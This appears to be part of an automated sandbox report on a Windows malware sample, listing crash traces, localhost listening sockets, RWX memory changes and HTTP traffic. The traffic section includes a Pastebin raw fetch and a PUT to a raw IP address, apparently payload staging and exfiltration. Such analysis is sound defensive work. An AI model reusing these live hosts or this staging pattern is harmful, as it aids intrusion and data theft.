__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5389d1c 0x5389b39 0x5383d6d 0x5382b12 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828196 registers.edi: 1828496 registers.eax: 0 registers.ebp: 1828508 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x538a0dc 0x5389b39 0x5383d6d 0x5382b12 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828484 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828492 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 55536916	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5389d1c 0x5389b39 0x5383d6d 0x5382b12 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 39 09 ff 15 58 a9 11 03 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5384c62 registers.esp: 1828196 registers.edi: 1828496 registers.eax: 0 registers.ebp: 1828508 registers.edx: 51488572 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 0	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x538a0dc 0x5389b39 0x5383d6d 0x5382b12 0x53817a1 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1828484 registers.edi: 1828792 registers.eax: 0 registers.ebp: 1828492 registers.edx: 0 registers.ebx: 1831188 registers.esi: 54382492 registers.ecx: 55624348	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 0x5388590 0x538b463 0x538aa0e 0x53817f9 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53885d3 registers.esp: 1829304 registers.edi: 1829568 registers.eax: 0 registers.ebp: 1829312 registers.edx: 0 registers.ebx: 1831188 registers.esi: 56166032 registers.ecx: 56173008	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x724a1194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72372ba1 mscorlib+0x36dd44 @ 0x7169dd44 mscorlib+0x32fea6 @ 0x7165fea6 mscorlib+0x30ab40 @ 0x7163ab40 0x53858ad 0x6364e59 0x63644ec 0x6363779 0x97d567 0x97779d 0x976e53 0x973c08 0x9735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x722f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7230264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72302e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x723b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x723b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72441dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72441e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72441f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7244416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7386f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72997f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72994de3 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 55 c9 5d 8b 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1828916 registers.edi: 0 registers.eax: 1828916 registers.ebp: 1828996 registers.edx: 0 registers.ebx: 5948864 registers.esi: 5797328 registers.ecx: 3083829898	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 123+0x4abe @ 0xfb4abe BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 2162212 registers.edi: 5115904 registers.eax: 2912 registers.ebp: 2162244 registers.edx: 2130566132 registers.ebx: 24576 registers.esi: 17663584 registers.ecx: 2788	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: 321+0x32849d @ 0x13d849d 321+0x3a4b75 @ 0x1454b75 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4848880 registers.edi: 18333696 registers.eax: 4848880 registers.ebp: 4848960 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 1995994155 registers.ecx: 1638465536	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: exception.instruction_r: ed e9 89 af ff ff 61 cc 14 50 40 00 cb 14 00 00 exception.symbol: 321+0x3aede2 exception.instruction: in eax, dx exception.module: 321.exe exception.exception_code: 0xc0000096 exception.offset: 3861986 exception.address: 0x145ede2 registers.esp: 4849000 registers.edi: 8007586 registers.eax: 1750617430 registers.ebp: 18333696 registers.edx: 22614 registers.ebx: 0 registers.esi: 2539784 registers.ecx: 20	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: exception.instruction_r: ed e9 1e cf fe ff c3 e9 8f a8 fe ff 8d 19 73 41 exception.symbol: 321+0x3a4237 exception.instruction: in eax, dx exception.module: 321.exe exception.exception_code: 0xc0000096 exception.offset: 3818039 exception.address: 0x1454237 registers.esp: 4849000 registers.edi: 8007586 registers.eax: 1447909480 registers.ebp: 18333696 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 2539784 registers.ecx: 10	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 wscanf_s+0x8323 regsvcs+0x44e43 @ 0x444e43 __swprintf_l-0x37721 regsvcs+0x2bcf @ 0x402bcf exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4042760 registers.edi: 2 registers.eax: 4042760 registers.ebp: 4042840 registers.edx: 2 registers.ebx: 2493848 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043096 registers.edi: 2937912 registers.eax: 4043096 registers.ebp: 4043176 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043096 registers.edi: 2942080 registers.eax: 4043096 registers.ebp: 4043176 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043180 registers.edi: 2942080 registers.eax: 4043180 registers.ebp: 4043260 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043180 registers.edi: 2942080 registers.eax: 4043180 registers.ebp: 4043260 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043096 registers.edi: 2942080 registers.eax: 4043096 registers.ebp: 4043176 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043180 registers.edi: 2942080 registers.eax: 4043180 registers.ebp: 4043260 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4042648 registers.edi: 2491312 registers.eax: 4042648 registers.ebp: 4042728 registers.edx: 2 registers.ebx: 28700 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4042648 registers.edi: 2491312 registers.eax: 4042648 registers.ebp: 4042728 registers.edx: 2 registers.ebx: 28700 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043180 registers.edi: 2942080 registers.eax: 4043180 registers.ebp: 4043260 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043096 registers.edi: 2942080 registers.eax: 4043096 registers.ebp: 4043176 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043180 registers.edi: 2942080 registers.eax: 4043180 registers.ebp: 4043260 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043096 registers.edi: 2942080 registers.eax: 4043096 registers.ebp: 4043176 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043180 registers.edi: 2942080 registers.eax: 4043180 registers.ebp: 4043260 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4043096 registers.edi: 2942080 registers.eax: 4043096 registers.ebp: 4043176 registers.edx: 2 registers.ebx: 2490824 registers.esi: 2490824 registers.ecx: 2490824	1
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: __swprintf_l-0x88c regsvcs+0x39a64 @ 0x439a64 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe24c4a02 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4042712 registers.edi: 2491312 registers.eax: 4042712 registers.ebp: 4042792 registers.edx: 2 registers.ebx: 12345344 registers.esi: 2490824 registers.ecx: 2490824	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (13 events)

Time & API	Arguments	Status	Return
bind April 24, 2023, 8:52 a.m.	ip_address: 0.0.0.0 socket: 1260 port: 0	1	0
bind April 24, 2023, 8:52 a.m.	ip_address: 0.0.0.0 socket: 728 port: 0	1	0
bind April 24, 2023, 8:45 a.m.	ip_address: 127.0.0.1 socket: 1084 port: 34041	1	0
listen April 24, 2023, 8:45 a.m.	socket: 1084 backlog: 10	1	0
accept April 24, 2023, 8:45 a.m.	ip_address: socket: 1084 port: 0		-1
accept April 24, 2023, 8:45 a.m.	ip_address: 127.0.0.1 socket: 1084 port: 49176	1	1284
accept April 24, 2023, 8:45 a.m.	ip_address: socket: 1084 port: 0		-1
accept April 24, 2023, 8:45 a.m.	ip_address: 127.0.0.1 socket: 1084 port: 49177	1	1312
accept April 24, 2023, 8:45 a.m.	ip_address: socket: 1084 port: 0		-1
accept April 24, 2023, 8:45 a.m.	ip_address: 127.0.0.1 socket: 1084 port: 49178	1	1376
accept April 24, 2023, 8:45 a.m.	ip_address: socket: 1084 port: 0		-1
accept April 24, 2023, 8:45 a.m.	ip_address: 127.0.0.1 socket: 1084 port: 49179	1	1388
accept April 24, 2023, 8:45 a.m.	ip_address: socket: 1084 port: 0		-1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

PUT http://185.159.130.81/clpr/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys

Performs some HTTP requests (4 events)

request	GET http://ip-api.com/json/?fields=query,status,countryCode,city,timezone
request	GET http://pastebin.com/raw/aCZb2pjR
request	PUT http://185.159.130.81/clpr/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys
request	GET https://pastebin.com/raw/aCZb2pjR

Allocates read-write-execute memory (usually to unpack itself) (50 out of 553 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d62000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755da000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7598b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7598b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755dc000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7597b000 process_handle: 0xffffffff	1
